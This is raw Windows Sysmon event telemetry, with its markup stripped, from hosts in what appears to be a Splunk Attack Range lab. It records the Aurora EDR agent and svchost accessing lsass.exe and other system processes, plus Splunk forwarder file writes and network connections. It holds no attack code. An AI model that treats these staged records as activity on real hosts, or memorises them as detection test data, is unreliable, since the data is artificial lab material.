Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015726Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.742{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015725Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.717{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015724Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.699{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015723Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.688{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015722Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.673{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015721Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.656{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015720Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.607{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015719Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.596{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015718Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.582{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015717Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.565{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015716Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.559{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015715Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015714Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015713Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.549{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 23542300x800000000000000015712Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.076{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2900050B5C1D466C11BE6D1EAFF58942,SHA256=66C26DC9C366B8B6022395C687CAD89C3E111A67D807F9411476BACBD3193E53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:23.990{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D2BFF5096B964FBBB12666307A3DE1,SHA256=BC58962FB9874CF2516DAE0111117B8326335AA0162326A703674D7530CFFAA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015744Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:23.266{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE97D5BA3AEDB6DA21AED2420DD3F239,SHA256=5CC97EF27B54D0182341AC09EA2C11F7F7EB828A3BCEDF1AD78AB14094D16E92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015746Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:24.348{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75685D74D845BB8B424CA73E7D3F0510,SHA256=04C81F8F6F3099BBD46C9FA97EC8A02BCBEA216A3B19F8DD8FE8C333DE591054,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015745Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:22.049{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50065-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000015751Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:25.670{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015750Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:25.670{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015749Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:25.670{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015748Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:25.654{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015747Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:25.429{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEFC16D6DFCAB14AAB07BF3AAF942DC1,SHA256=D179A9BE5B9068D0E7FB9E19D24CC6053F7CC53EB02834CA2591861F55F491BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:25.049{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9832883CB74E0E746966A07A38C21D7,SHA256=6EA7319C20E49AAB1544A4057C88A0657EA1D78F7594967EC9D9F0C9C542DB0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015752Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:26.507{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C546712946BA910DBF1D5409A9513F5F,SHA256=F6A35F3B6ECB1E0397032750D55C8DF3F38751A65D522BF2B62A68068B110176,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:26.518{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=AC8D9E8CFF7C6C7A49EDF2C654172306,SHA256=4114D69E405E1903FF7AB230C8006FF017957950993492E5AE8DBDFB8EEE3D80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:26.112{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B78D74176BE49A4A3CC1A83780C3B41B,SHA256=73E7AB4FCA3411A60325126B4444775D8B0479305EEDDFC0BDB547C519F939CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015753Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:27.599{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85C3420F8186D2B63F2E8B878F63DE1A,SHA256=C4445AB4C86017A2935DBEADFC1AD89BEF7260CD5B76A35358E57EB6416EFF28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:27.513{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:27.201{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EE427ABA5CE56C94E49AD51026E5FF8,SHA256=243ADF0FB796EC0265965C6CA4E7E3E51D9B3C7DAD90801EF88A54FF3014860D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000040949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:24.534{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56261-false10.0.1.12-8000- 23542300x800000000000000015754Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:28.686{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BF6F0F9C2AF3B92B008DE5247C12662,SHA256=98B6B7E1373DE5BC72399C5F07B417B6883212038F63C1DAC246F7E90C8A41E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:28.159{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1FB75E8D157E3CC2530BBA9614AE28F,SHA256=D181AA4E3EE74EE2B0C471D37A565C79DBE7122DE5C60DCF1A0E910C0FACEDDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015786Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E3D1-63C7-EF01-00000000B002}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015785Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 